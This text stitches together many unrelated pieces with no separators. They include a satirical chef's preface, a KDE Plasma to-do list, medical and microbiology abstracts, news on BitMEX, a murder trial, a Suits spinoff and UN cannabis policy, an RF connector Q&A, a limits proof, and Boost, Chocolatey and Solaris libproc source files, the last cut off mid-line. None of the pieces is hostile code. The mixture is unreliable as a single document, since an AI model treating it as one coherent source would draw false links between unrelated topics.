I am Chef Enis LeConnard. You haven’t heard of me because I run the most exclusive restaurant in this quadrant. It’s so expensive, you can’t even afford to know its name—let alone where it is. Because of my restaurant, the Michelin folks are busy designing a new logarithmic star system just to keep French Laundry from being categorically lumped with McDonald’s. So, I’m certain you’ll find it a treat that I’ve deigned to hand you my techniques and recipes. Be forewarned: it’s not my fault if they don’t work for you. After all, you’re not a particularly good cook. You can’t expect to succeed. But you can try. I will help. Good luck.
Contents Tasks If you want to claim a task, please put your name (or nickname, both is better) in brackets near the task you wish to claim. Please add it when you start working on it, and if you stop, please remove it, so we can know "who is working on what" and what tasks still needs to be started. And, of course, this will avoid duplication of work. Thanks a lot! =) Note This is not meant to be a replacement for the feature list on the release schedules pages, but rather a place to record things that aren't there. KRunner Runners runners, runners and more runners! Interface improve paging nicer user switcher Misc Plasma Documentation design docs coverage (workspace/plasma/design/) Techbase tutorials for: Wallpaper plugins Containments DataEngine Service Theming website overhaul General libplasma more unit tests. Plasma::Applet add global settings config page, if it exists in the Package (which means adding a pair of entries in packages.cpp for globalconfigui and globalconfigxml), alongside the per-applet ones
Nurse/health counseling model for a successful alcoholism assistance program. International Harvester Company had developed a unique program utilizing the occupational health nurse as a nurse/health counselor for a corporate alcoholism assistance program. As a result of this program, absenteeism, disability and medical payments, and hospitalizations in a group of 342 employees have significantly declined.
News BitMEX Owns 0.15% Of Bitcoin Supply As Insurance Fund hits $324M Cryptocurrency derivatives giant BitMEX now controls 0.15% of all the bitcoins in circulation, new data from the company reveals. BitMEX Expands Fund By 50% Since January Compiled by industry media outlet The Block, a chart of BitMEX’s Insurance Fund shows its stock has reached 31,300 BTC as of August 25. That figure is the largest on record for the fund, which BitMEX uses to reimburse winning traders on behalf of those who do not have funds to cover losses. The Fund has become well known due to its rapid increase in size since 2018 in particular. Compared to January 1 this year, its balance has increased by over 50%. Twelve months ago, the Fund held just 10,000 BTC, at the time valued at $77.5 million. As BitMEX explains in a dedicated blog post, the Fund acts as a safeguard for users who incorrectly guess the trajectory of the market and avoid accruing negative balances on their account. The Fund has held a positive balance since March In 2017 when a sudden market crash caused by US regulators’ rejection of the first Bitcoin exchange-traded fund (ETF) saw its entire reserves used up. Since then, the company has mushroomed into one of the most formidable exchange platforms in the cryptocurrency world. As Bitcoin grew in 2019, so too did BitMEX’s notoriety for liquidating huge numbers of traders in times of volatility. As Bitcoinist reported, its success has attracted the attention of US regulators, who in July revealed they were investigating reports of US traders circumventing security protocols to trade on the platform secretly. The impact became obvious for BitMEX, which registered huge capital outflows after the news broke. Arthur Hayes, the company’s traditionally vocal CEO, then announced he was retiring until September, allegedly choosing to live in the wilderness and shunning media appearances. Margin Trading Implicated In Bitcoin Price Spikes This week, meanwhile, a fresh theory emerged supporting the idea that margin trading like that offered by BitMEX directly induces volatility on Bitcoin markets. Recent weeks have seen sudden moves of up to $1000 in each direction for Bitcoin, in between periods of almost zero price movement. Uploading a combined volume chart, the Twitter trader known as CryptoSqueeze directly attributed the phenomenon to actors like BitMEX. The effect of cascading margin calls and stop loss triggers causing $300 slippage between XBT perpetual swaps on Bitmex vs Spot BTC. One word for overleveraged traders: Brutal pic.twitter.com/blDgtXZImB — Squeezy (@cryptoSqueeze) August 26, 2019 “The effect of cascading margin calls and stop-loss triggers causing $300 slippage between XBT perpetual swaps on Bitmex vs Spot BTC,” the account noted. “One word for overleveraged traders: Brutal.” What do you think about BitMEX’s insurance fund and Bitcoin price impact? Let us know in the comments below! Images via Shutterstock, Twitter: @cryptoSqueeze
Hawlings River Hawlings River is a tributary of the Patuxent River in Montgomery County, Maryland. The watershed covers an area of about . The headwaters of the river originate in the area north of Laytonsville, and the river flows southeast, entering the Patuxent about below the Triadelphia Reservoir. Portions of Hawlings River flow through Rachel Carson Conservation Park and Hawlings River Stream Valley Park. Tributaries of the Hawlings River include Mount Zion Tributary, Reddy Branch, Olney Mill Tributary, Gregg Tributary, and James Creek. The river and its tributaries total about of streams. See also List of rivers of Maryland References Notes Bibliography MCDEP. "Watershed Information: The Hawlings River Watershed." Category:Tributaries of the Patuxent River Category:Rivers of Montgomery County, Maryland Category:Rivers of Maryland
SAINT-JEROME -- Ugo Fredette was sentenced to life in prison with no chance of parole for 25 years after being found guilty on two counts of first degree murder on Saturday. Fredette was charged with the murders of his ex-wife Veronique Barbe, 41, and Yvon Lacasse, 71. After the verdict was read Barbe's brother Daniel tearfully thanked the Crown prosecutors and officers from the Ontario Provincial Police, Surete du Quebec and St. Eustache police force for bringing Fredette to justice. "Now it's time to turn the page. It won't be easy. She was so marvelous. It will take time, but now we can start to turn the page," he said. Barbe said he didn't want to comment on Fredette's sentence but said he "wishes nothing bad for him. He'll wake up every morning remembering what he did." During the trial the families of the two victims became close, leaning on each other for support. "Everybody was there for each other, so it was easier a little," said Barbe. "It was good, it was good." Lacasse's daughter Jennifer called the verdict "good for our hearts." "The movie that Mr. Fredette created in his head, the jury didn't believe it," she said. The trial began late last month with Fredette pleading not guilty to two first-degree murder charges. Family members burst into tears in the courtroom the second the sentence was rendered. One person started clapping. @CTVMontreal — Kelly Greig (@KellyGreig) October 19, 2019 The judge is asking the jury for a recommendation if #Fredette should serve consecutive sentences of life in prison with no chance of parole for 25 years. Jury will deliberate but it’s not necessary to render a decision on this- ultimately the sentence is up to judge @CTVMontreal — Kelly Greig (@KellyGreig) October 19, 2019 Fredette glanced towards the roughly two dozen friends and family members gathered in the courtroom as he entered, but stared straight ahead as verdict was rendered. @CTVMontreal — Kelly Greig (@KellyGreig) October 19, 2019 Judge sentences Ugo Fredette to life in prison with no chance of parole for at least 25 years. That is the minimum sentence for first degree murder. No decision on consecutive sentences @CTVMontreal — Kelly Greig (@KellyGreig) October 19, 2019 On Sept. 14, 2017, Barbe’s body was found lifeless in the family home. She had been stabbed 17 times. Fredette went on the run, taking with him a six-year-old child that was in the house at the time. During the trial, Fredette testified that, on the day she died, the couple had gotten into a fight and Barbe had pushed him down a flight of stairs. Fredette said he remembers Barbe had a knife and he blocked her, but insisted he doesn’t remember anything that happened after that. "I just remember her lying in a pool of blood on the kitchen floor with a knife in her chest," he cried in court. “The only image I have is Veronique in the kitchen with a knife in her chest. That image haunts me, disgusts me. I loved her.” The Crown claimed that while he was fleeing Fredette killed Lacasse in order to steal his car. Daniel Barbe is Veronique’s brother. His family and the Lacasse family spent a lot of time together through this trial, which he says was a huge help to have others understand the pain. @CTVMontreal pic.twitter.com/VmAFSkc0hO — Kelly Greig (@KellyGreig) October 19, 2019 During his closing arguments, Fredette’s lawyer, Louis-Alexandre Martin asked jurors to find his client guilty of manslaughter instead of murder. "He snapped," he said, insisting that his client had no intention of killing anyone. Fredette was arrested one day after the incident, on Sept. 15, 2017, in Ontario after having travelled through several Quebec cities with the boy. -- with files from CTV News’ Rob Lurie and The Canadian Press.
USA Network’s upcoming Suits spinoff series will be titled Pearson, after its lead character. Primetime-Panic Your Complete Guide to Pilots and Straight-to-Series orders See All The long-untitled project, from UCP, Suits creator and executive producer Aaron Korsh and executive producer Daniel Arkin, is centered on powerhouse lawyer Jessica Pearson (Gina Torres) as she adjusts to the dirty world of Chicago politics. Co-starring alongside Torres are Simon Kassianides, Morgan Spector, Bethany Joy Lenz, Chantel Riley, Isabel Arraiza and Eli Goree The spinoff was introduced in the Season 7 finale of Suits, which served as a backdoor pilot. Doug Liman, David Bartis and Gene Klein of Hypnotic and Torres also executive produce. Arkin serves as showrunner on the series, set to debut this year. Kevin Bray exec produces and directed the pilot.
Q: What is this RF connector? And what will I need to mount it in my wall? I'd like to mount it similar to the below images in my wall. Will I need any additional adapters/converters? So to put all my questions in one place: What is this RF connector(s)? What additional hardware/adapters will I need to mount it in my wall like in the picture (connector types in the image are irrelevant, it's just an example of how I want to mount the jacks in the wall)? What helpful advice can you give (how big of a whole to drill in a wall faceplate, advice on selecting adapters or other needed hardware, comments on condition of equipment shown in images, etc.)? A: For Question 1: As others have said, this does look like a PL-259/SO-239, commonly called a UHF Connector. Question 2: You can get wall mount adapters for these connections too, I'm not sure I can post links here, but search for "SO-239 wall plate". In the event you can't find this specific one, you could potentially use others, like the one in your photo on the right which looks to be a BNC connector. You can get UHF to BNC adapters fairly readily at most electronics stores. As Phil Frost pointed out, check the rating on ALL connectors that you use, meet the requirements for the power you are going to run. Question 3: The wall plate you end up purchasing, should come with instructions for mounting, this will let you know how big a hole to cut. Definitely do not cut holes in your wall until you have selected the wall plate you want to place Make sure you sketch out your implementation, as this will let you build a list of required components. Make sure however you bring this cable in from the outside, it is very well weather proofed, cutting holes in exterior walls is easy, but you need to be careful you aren't destroying any moisture membranes or anything else in the process. Be VERY careful when you make the hole to bring this into the house that you aren't drilling near any pipes or electrical wires, you can buy tools (or borrow as they can be expensive) to detect wires and pipes in walls before you start drilling. I'm not sure how tall your antenna there is, but the usual safety precautions around harnesses for climbing and staying WELL clear of any overhead power lines apply. You don't mention what your living situation is, but you should also check if you are allowed to erect an antenna like this, as often there are restrictions. As Pete NU9W pointed out - One additional point about the entrance from the outside: when it leaves the wall on the outside the cable should initially go down, even if its destination is up. That forms a drip loop, which makes it harder for water to follow the cable into the wall.
Antibacterial activity and mechanism of action of tick defensin against Gram-positive bacteria. Defensins are a major group of antimicrobial peptides and are found widely in vertebrates, invertebrates and plants. Invertebrate defensins have been identified from insects, scorpions, mussels and ticks. In this study, chemically synthesized tick defensin was used to further investigate the activity spectrum and mode of action of natural tick defensin. Synthetic tick defensin showed antibacterial activity against many Gram-positive bacteria but not Gram-negative bacteria and low hemolytic activity, characteristic of invertebrate defensins. Furthermore, bactericidal activity against pathogenic Gram-positive bacteria including Bacillus cereus, Enterococcus faecalis and methicillin-resistant Staphylococcus aureus was observed. However, more than 30 min was necessary for tick defensin to completely kill bacteria. The interaction of tick defensin with the bacterial cytoplasmic membrane and its ability to disrupt the membrane potential was analyzed. Tick defensin was able to disrupt the membrane potential over a period of 30-60 min consistent with its relatively slow killing. Transmission electron microscopy of Micrococcus luteus treated with tick defensin showed lysis of the cytoplasmic membrane and leakage of cellular cytoplasmic contents. These findings suggest that the primary mechanism of action of tick defensin is bacterial cytoplasmic membrane lysis. In addition, incomplete cell division with multiple cross-wall formation was occasionally seen in tick defensin-treated bacteria showing pleiotropic secondary effects of tick defensin.
// (C) Copyright Gennadiy Rozental 2001. // Distributed under the Boost Software License, Version 1.0. // (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) // See http://www.boost.org/libs/test for the library home page. // // File : $RCSfile$ // // Version : $Revision: 74248 $ // // Description : toolbox implementation types and forward declarations // *************************************************************************** #ifndef BOOST_TEST_TOOLS_DETAIL_FWD_HPP_012705GER #define BOOST_TEST_TOOLS_DETAIL_FWD_HPP_012705GER // Boost.Test #include <boost/test/detail/config.hpp> #include <boost/test/utils/basic_cstring/io.hpp> // STL #include <cstddef> // for std::size_t #include <boost/test/detail/suppress_warnings.hpp> //____________________________________________________________________________// namespace network_boost { namespace unit_test { class lazy_ostream; } // namespace unit_test namespace test_tools { using unit_test::const_string; class assertion_result; //____________________________________________________________________________// namespace tt_detail { inline bool dummy_cond() { return false; } // ************************************************************************** // // ************** types of supported assertions ************** // // ************************************************************************** // //____________________________________________________________________________// enum check_type { CHECK_PRED, CHECK_MSG, CHECK_EQUAL, CHECK_NE, CHECK_LT, CHECK_LE, CHECK_GT, CHECK_GE, CHECK_CLOSE, CHECK_CLOSE_FRACTION, CHECK_SMALL, CHECK_BITWISE_EQUAL, CHECK_PRED_WITH_ARGS, CHECK_EQUAL_COLL, CHECK_BUILT_ASSERTION }; //____________________________________________________________________________// // ************************************************************************** // // ************** levels of supported assertions ************** // // ************************************************************************** // enum tool_level { WARN, CHECK, REQUIRE, PASS }; //____________________________________________________________________________// // ************************************************************************** // // ************** Tools offline implementation ************** // // ************************************************************************** // BOOST_TEST_DECL bool report_assertion( assertion_result const& pr, unit_test::lazy_ostream const& assertion_descr, const_string file_name, std::size_t line_num, tool_level tl, check_type ct, std::size_t num_args, ... ); //____________________________________________________________________________// BOOST_TEST_DECL assertion_result format_assertion_result( const_string expr_val, const_string details ); //____________________________________________________________________________// BOOST_TEST_DECL assertion_result format_fpc_report( const_string expr_val, const_string details ); //____________________________________________________________________________// BOOST_TEST_DECL bool is_defined_impl( const_string symbol_name, const_string symbol_value ); //____________________________________________________________________________// BOOST_TEST_DECL assertion_result equal_impl( char const* left, char const* right ); //____________________________________________________________________________// } // namespace tt_detail } // namespace test_tools } // namespace network_boost #include <boost/test/detail/enable_warnings.hpp> #endif // BOOST_TEST_TOOLS_DETAIL_FWD_HPP_012705GER
// Copyright © 2017 - 2018 Chocolatey Software, Inc // Copyright © 2011 - 2017 RealDimensions Software, LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. namespace chocolatey.infrastructure.app.utility { using System; using configuration; public class PackageUtility { /// <summary> /// Is the package we are installing a dependency? Semi-virtual packages do not count: /// .install / .app / .portable / .tool / .commandline /// </summary> /// <param name="config">The configuration.</param> /// <param name="packageName">Name of the package.</param> /// <returns>true if the package is a dependency, false if the package is the one specified or a virtual/semi-virtual</returns> public static bool package_is_a_dependency(ChocolateyConfiguration config, string packageName) { if (string.IsNullOrWhiteSpace(config.PackageNames)) return true; if (string.IsNullOrWhiteSpace(packageName)) return true; foreach (var package in config.PackageNames.Split(new[] { ApplicationParameters.PackageNamesSeparator }, StringSplitOptions.RemoveEmptyEntries).or_empty_list_if_null()) { if (packageName.is_equal_to(package) || packageName.contains(package + ".") || (packageName.contains(package) && (packageName.contains(".nupkg") || packageName.contains(".nuspec") || packageName.contains("\\") ) ) ) { return false; } } return true; } } }
The United Nations is once again chastising Canada for allowing cannabis to be used recreationally, even as the world body inches toward its own version of legalization. On Tuesday, a senior UN bureaucrat said recreational cannabis legalization efforts underway around the world pose a “significant challenge” to public health. The criticism came barely one week after the UN body responsible for drug policy delayed plans to vote on expert recommendations to loosen global restrictions on cannabis and cannabis-derived products. As legal cannabis growers increasingly look to capitalize on expanding international markets, the delay represents the latest challenge facing companies whose ambitions continue to move faster than the bureaucratic wheels of the UN. Story continues below advertisement Tuesday’s comments from UN International Narcotics Control Board (INCB) president Viroj Sumyai, meanwhile, are simply the latest in a litany of disapproving statements from the world body stretching back more than a year. In its 2017 annual report published in March 2018, the INCB said it “notes with concern that in Canada” Bill C-45 was tabled in the House of Commons in April of 2017. “As the Board has stated repeatedly,” the document said, if the Cannabis Act became Canadian law - as it subsequently did - it would be “incompatible with the obligations assumed by Canada” under the 1961 International Drug Control Convention. The gloves really came off just days before Canada’s legal recreational cannabis regime took effect. In an Oct. 15, 2018, statement, INCB president Viroj Sumyai said not only was Canada violating the 1961 treaty, but he repeatedly referred to cannabis consumption in general as “not a healthy lifestyle choice.” Less than a month later, from Nov. 12 to 16, the UN-backed World Health Organization’s Expert Committee on Drug Dependence met in Geneva to conduct “critical reviews… to determine the most relevant level of international control for cannabis and cannabis-related substances and whether the [WHO] should recommend changes in their level of control.” In an open letter to U.N. Secretary-General António Guterres dated Jan. 24, 2019, WHO director-general Tedros Adhanom Ghebreyesus recommended broad rescheduling that would effectively remove cannabis products from the strictest level of international control to a level more akin to common painkiller ingredients such as codeine. The 1961 Convention, as well as the 1971 Convention on Psychotropic Substances, can only be altered by a majority of the 53 UN member states comprising the Commission on Narcotic Drugs (CND). The 1961 treaty can be altered by a simple majority of 27 member states, though a two-thirds majority of at least 35 CND members is required before changes to the 1971 treaty can be approved. Previously expected to come to a vote when the full CND meets in Vienna from March 14 to 22, but in an intersessional meeting on February 25th, Mexican Ambassador and current CND chair Alicia Buenrostro Massieu recommended the vote be postponed. Despite requests from other members such as Uruguay to set a new date for the vote on cannabis rescheduling, no date has been established and in the meantime, the criticism continues. Story continues below advertisement Story continues below advertisement “Legalization of cannabis for recreational purposes… represents not only a challenge to the universal implementation of [the 1961 and 1971 treaties], but also a significant challenge to health and well-being, particularly among young people,” the INCB’s Mr. Sumyai said in a March 5th interview with the U.N.’s internal news service following the publication of the board’s latest annual report. While many have heralded the WHO recommendations made earlier this year as a positive step for the global cannabis legalization movement, there is no guarantee of any other steps getting taken. “The reality of the situation is [the Commission on Narcotic Drugs] does not have to vote, ever,” U.N.-based freelance journalist Sara Brittany Somerset wrote in a recent analysis for Forbes. “The participating member states can, in fact, waffle and procrastinate indefinitely about cannabis.” Timeline March 1, 2018 UN body “notes with concern” that Canada is about to legalize recreational cannabis June 4-7 2018 WHO expert committee decides to recommend all restrictions on pure cannabidiol-based (CBD) products be lifted March 5, 2019 Due to technical reasons, we have temporarily removed commenting from our articles. We hope to have this fixed soon. Thank you for your patience. If you are looking to give feedback on our new site, please send it along to feedback@globeandmail.com. If you want to write a letter to the editor, please forward to letters@globeandmail.com.
Q: Prove: $limX_n=0 \implies lim\left|X_n\right|^k = 0, k>0$. What if $k<0$? This is what I've done so far. Not sure it it's correct tough, and what in case when $k<0$. *Proof: Since $X_n$ converges to 0, by $\epsilon$ definition, we have: $$(\forall\epsilon>0)(\exists n_0\in \mathbb{N})(\forall n \in \mathbb{N})(n\ge n_0 \implies \left|X_n\right| < \epsilon)$$ Since this holds $\forall\epsilon > 0$, it also must hold for $\epsilon<1$, so almost every element of $X_n$ is smaller than 1. In other words $(\exists n_1 \in \mathbb{N})(\forall n \in \mathbb{N})(n \ge n_1 \implies \left|X_n\right| < 1)$. Because $\left|X_n\right| < 1$, we can write it down like $\frac{1}{m}, m > 1$, so: $$\left|X_n\right| = \frac{1}{m} > \frac{1}{m^k} = \left|X_n\right|^k, k>0$$Plugin back in $\epsilon$, we have: $$(\forall\epsilon>0)(\forall n \in N)(n \ge max(n_0, n_1) \implies \left|X_n\right|^k < \left|X_n\right| < \epsilon)$$ which proves the first part where $k>0$. Now if $k<0$, then $\frac{1}{m^k} = m^k > \frac{1}{m}$, so $\left|X_n\right|^k > \left|X_n\right|$, and we can't say that $\left|X_n\right|^k$ also converges to $0$,instead, it diverges to $+\infty$. Is this correct? A: The original statement (given) says that for any $\varepsilon>0,\ \exists\ N\in\mathbb{N}$ such that $$|X_n|<\varepsilon\ \forall\ n\geq N$$ From there, assuming that $k>0$, for any $\varepsilon^{1/k}>0$ (a different epsilon, of course), we also have that $\exists\ N\in\mathbb{N}$ such that $$|X_n|<\varepsilon^{1/k}\ \forall\ n\geq N$$ Noting that for large $n$, $|X_n|<1$, we can legitimately say that $$|X_n|^k<\varepsilon\ \forall\ n>N$$ It seems you have a good grip on this. Now, for the second result, let $\ell=-k<0$, so that $\varepsilon^{1/\ell}=\frac{1}{\varepsilon^{1/k}}$. We have, from the given, that for any $\frac{1}{\varepsilon^{1/k}}>0$ and some $N\in\mathbb{N}$, $$|X_n|<\frac{1}{\varepsilon^{1/k}}\ \forall\ n\geq N$$ Since both sides are positive, this permits the rearrangement $$\varepsilon^{1/k}<\frac{1}{|X_n|}\ \forall\ n\geq N$$ Again, with both sides positive, we can also say $$\varepsilon<\frac{1}{|X_n|^k}\ \forall\ n\geq N$$ Considering $\varepsilon$ arbitrarily large this time, we can see that by the quantity diverges as $n\to\infty$. The final step is to note that we can simply rewrite the last step as $$\varepsilon<|X_n|^{\ell}\ \forall\ n\geq N$$ where $\ell=-k$.
/* * Copyright (c) 2002, 2011, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. * */ /* * Interfaces available from the process control library, libproc. * * libproc provides process control functions for the /proc tools * (commands in /usr/proc/bin), /usr/bin/truss, and /usr/bin/gcore. * libproc is a private support library for these commands only. * It is _not_ a public interface, although it might become one * in the fullness of time, when the interfaces settle down. * * In the meantime, be aware that any program linked with libproc in this * release of Solaris is almost guaranteed to break in the next release. * * In short, do not use this header file or libproc for any purpose. */ #ifndef _LIBPROC_H #define _LIBPROC_H #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <nlist.h> #include <door.h> #include <gelf.h> #include <proc_service.h> #include <rtld_db.h> #include <procfs.h> #include <sys/stat.h> #include <sys/statvfs.h> #include <sys/auxv.h> #include <sys/resource.h> #include <sys/socket.h> #include <sys/utsname.h> #ifdef __cplusplus extern "C" { #endif /* * Opaque structure tag reference to a process control structure. * Clients of libproc cannot look inside the process control structure. * The implementation of struct ps_prochandle can change w/o affecting clients. */ struct ps_prochandle; extern int _libproc_debug; /* set non-zero to enable debugging fprintfs */ #if defined(sparc) || defined(__sparc) #define R_RVAL1 R_O0 /* register holding a function return value */ #define R_RVAL2 R_O1 /* 32 more bits for a 64-bit return value */ #define SYSCALL32 0x91d02008 /* 32-bit syscall (ta 8) instruction */ #define SYSCALL64 0x91d02040 /* 64-bit syscall (ta 64) instruction */ typedef uint32_t syscall_t; /* holds a syscall instruction */ #endif /* sparc */ #if defined(__i386) || defined(__ia64) #define R_PC EIP #define R_SP UESP #define R_RVAL1 EAX /* register holding a function return value */ #define R_RVAL2 EDX /* 32 more bits for a 64-bit return value */ #define SYSCALL 0x9a /* syscall (lcall) instruction opcode */ typedef uchar_t syscall_t[7]; /* holds a syscall instruction */ #endif /* __i386 || __ia64 */ #define R_RVAL R_RVAL1 /* simple function return value register */ /* maximum sizes of things */ #define PRMAXSIG (32 * sizeof (sigset_t) / sizeof (uint32_t)) #define PRMAXFAULT (32 * sizeof (fltset_t) / sizeof (uint32_t)) #define PRMAXSYS (32 * sizeof (sysset_t) / sizeof (uint32_t)) /* State values returned by Pstate() */ #define PS_RUN 1 /* process is running */ #define PS_STOP 2 /* process is stopped */ #define PS_LOST 3 /* process is lost to control (EAGAIN) */ #define PS_UNDEAD 4 /* process is terminated (zombie) */ #define PS_DEAD 5 /* process is terminated (core file) */ /* Flags accepted by Pgrab() */ #define PGRAB_RETAIN 0x01 /* Retain tracing flags, else clear flags */ #define PGRAB_FORCE 0x02 /* Open the process w/o O_EXCL */ #define PGRAB_RDONLY 0x04 /* Open the process or core w/ O_RDONLY */ #define PGRAB_NOSTOP 0x08 /* Open the process but do not stop it */ /* Error codes from Pcreate() */ #define C_STRANGE -1 /* Unanticipated error, errno is meaningful */ #define C_FORK 1 /* Unable to fork */ #define C_PERM 2 /* No permission (file set-id or unreadable) */ #define C_NOEXEC 3 /* Cannot find executable file */ #define C_INTR 4 /* Interrupt received while creating */ #define C_LP64 5 /* Program is _LP64, self is _ILP32 */ /* Error codes from Pgrab(), Pfgrab_core(), and Pgrab_core() */ #define G_STRANGE -1 /* Unanticipated error, errno is meaningful */ #define G_NOPROC 1 /* No such process */ #define G_NOCORE 2 /* No such core file */ #define G_NOPROCORCORE 3 /* No such proc or core (for proc_arg_grab) */ #define G_NOEXEC 4 /* Cannot locate executable file */ #define G_ZOMB 5 /* Zombie process */ #define G_PERM 6 /* No permission */ #define G_BUSY 7 /* Another process has control */ #define G_SYS 8 /* System process */ #define G_SELF 9 /* Process is self */ #define G_INTR 10 /* Interrupt received while grabbing */ #define G_LP64 11 /* Process is _LP64, self is ILP32 */ #define G_FORMAT 12 /* File is not an ELF format core file */ #define G_ELF 13 /* Libelf error, elf_errno() is meaningful */ #define G_NOTE 14 /* Required PT_NOTE Phdr not present in core */ /* Flags accepted by Prelease */ #define PRELEASE_CLEAR 0x10 /* Clear all tracing flags */ #define PRELEASE_RETAIN 0x20 /* Retain final tracing flags */ #define PRELEASE_HANG 0x40 /* Leave the process stopped */ #define PRELEASE_KILL 0x80 /* Terminate the process */ typedef struct { /* argument descriptor for system call (Psyscall) */ long arg_value; /* value of argument given to system call */ void *arg_object; /* pointer to object in controlling process */ char arg_type; /* AT_BYVAL, AT_BYREF */ char arg_inout; /* AI_INPUT, AI_OUTPUT, AI_INOUT */ ushort_t arg_size; /* if AT_BYREF, size of object in bytes */ } argdes_t; typedef struct { /* return values from system call (Psyscall) */ int sys_errno; /* syscall error number */ long sys_rval1; /* primary return value from system call */ long sys_rval2; /* second return value from system call */ } sysret_t; /* values for type */ #define AT_BYVAL 1 #define AT_BYREF 2 /* values for inout */ #define AI_INPUT 1 #define AI_OUTPUT 2 #define AI_INOUT 3 /* maximum number of syscall arguments */ #define MAXARGS 8 /* maximum size in bytes of a BYREF argument */ #define MAXARGL (4*1024) /* Kludges to make things work on Solaris 2.6 */ #if !defined(_LP64) && !defined(PR_MODEL_UNKNOWN) #define PR_MODEL_UNKNOWN 0 #define PR_MODEL_ILP32 0 /* process data model is ILP32 */ #define PR_MODEL_LP64 2 /* process data model is LP64 */ #define PR_MODEL_NATIVE PR_MODEL_ILP32 #define pr_dmodel pr_filler[0] #define STACK_BIAS 0 #endif /* * Function prototypes for routines in the process control package. */ extern struct ps_prochandle *Pcreate(const char *, char *const *, int *, char *, size_t); extern const char *Pcreate_error(int); extern struct ps_prochandle *Pgrab(pid_t, int, int *); extern struct ps_prochandle *Pgrab_core(const char *, const char *, int, int *); extern struct ps_prochandle *Pfgrab_core(int, const char *, int *); extern const char *Pgrab_error(int); extern int Preopen(struct ps_prochandle *); extern void Prelease(struct ps_prochandle *, int); extern void Pfree(struct ps_prochandle *); extern int Pasfd(struct ps_prochandle *); extern int Pctlfd(struct ps_prochandle *); extern int Pcreate_agent(struct ps_prochandle *); extern void Pdestroy_agent(struct ps_prochandle *); extern int Pwait(struct ps_prochandle *, uint_t); extern int Pstop(struct ps_prochandle *, uint_t); extern int Pstate(struct ps_prochandle *); extern const psinfo_t *Ppsinfo(struct ps_prochandle *); extern const pstatus_t *Pstatus(struct ps_prochandle *); extern int Pcred(struct ps_prochandle *, prcred_t *, int); extern int Pgetareg(struct ps_prochandle *, int, prgreg_t *); extern int Pputareg(struct ps_prochandle *, int, prgreg_t); extern int Psetrun(struct ps_prochandle *, int, int); extern ssize_t Pread(struct ps_prochandle *, void *, size_t, uintptr_t); extern ssize_t Pread_string(struct ps_prochandle *, char *, size_t, uintptr_t); extern ssize_t Pwrite(struct ps_prochandle *, const void *, size_t, uintptr_t); extern int Pclearsig(struct ps_prochandle *); extern int Pclearfault(struct ps_prochandle *); extern int Psetbkpt(struct ps_prochandle *, uintptr_t, ulong_t *); extern int Pdelbkpt(struct ps_prochandle *, uintptr_t, ulong_t); extern int Pxecbkpt(struct ps_prochandle *, ulong_t); extern int Psetflags(struct ps_prochandle *, long); extern int Punsetflags(struct ps_prochandle *, long); extern int Psignal(struct ps_prochandle *, int, int); extern int Pfault(struct ps_prochandle *, int, int); extern int Psysentry(struct ps_prochandle *, int, int); extern int Psysexit(struct ps_prochandle *, int, int); extern void Psetsignal(struct ps_prochandle *, const sigset_t *); extern void Psetfault(struct ps_prochandle *, const fltset_t *); extern void Psetsysentry(struct ps_prochandle *, const sysset_t *); extern void Psetsysexit(struct ps_prochandle *, const sysset_t *); extern void Psync(struct ps_prochandle *); extern sysret_t Psyscall(struct ps_prochandle *, int, uint_t, argdes_t *); extern int Pisprocdir(struct ps_prochandle *, const char *); /* * Function prototypes for system calls forced on the victim process. */ extern int pr_open(struct ps_prochandle *, const char *, int, mode_t); extern int pr_creat(struct ps_prochandle *, const char *, mode_t); extern int pr_close(struct ps_prochandle *, int); extern int pr_door_info(struct ps_prochandle *, int, struct door_info *); extern void *pr_mmap(struct ps_prochandle *, void *, size_t, int, int, int, off_t); extern void *pr_zmap(struct ps_prochandle *, void *, size_t, int, int); extern int pr_munmap(struct ps_prochandle *, void *, size_t); extern int pr_memcntl(struct ps_prochandle *, caddr_t, size_t, int, caddr_t, int, int); extern int pr_sigaction(struct ps_prochandle *, int, const struct sigaction *, struct sigaction *); extern int pr_getitimer(struct ps_prochandle *, int, struct itimerval *); extern int pr_setitimer(struct ps_prochandle *, int, const struct itimerval *, struct itimerval *); extern int pr_ioctl(struct ps_prochandle *, int, int, void *, size_t); extern int pr_fcntl(struct ps_prochandle *, int, int, void *); extern int pr_stat(struct ps_prochandle *, const char *, struct stat *); extern int pr_lstat(struct ps_prochandle *, const char *, struct stat *); extern int pr_fstat(struct ps_prochandle *, int, struct stat *); extern int pr_statvfs(struct ps_prochandle *, const char *, statvfs_t *); extern int pr_fstatvfs(struct ps_prochandle *, int, statvfs_t *); extern int pr_getrlimit(struct ps_prochandle *, int, struct rlimit *); extern int pr_setrlimit(struct ps_prochandle *, int, const struct rlimit *); #if defined(_LARGEFILE64_SOURCE) extern int pr_getrlimit64(struct ps_prochandle *, int, struct rlimit64 *); extern int pr_setrlimit64(struct ps_prochandle *, int, const struct rlimit64 *); #endif /* _LARGEFILE64_SOURCE */ extern int pr_lwp_exit(struct ps_prochandle *); extern int pr_exit(struct ps_prochandle *, int); extern int pr_waitid(struct ps_prochandle *, idtype_t, id_t, siginfo_t *, int); extern off_t pr_lseek(struct ps_prochandle *, int, off_t, int); extern offset_t pr_llseek(struct ps_prochandle *, int, offset_t, int); extern int pr_rename(struct ps_prochandle *, const char *, const char *); extern int pr_link(struct ps_prochandle *, const char *, const char *); extern int pr_unlink(struct 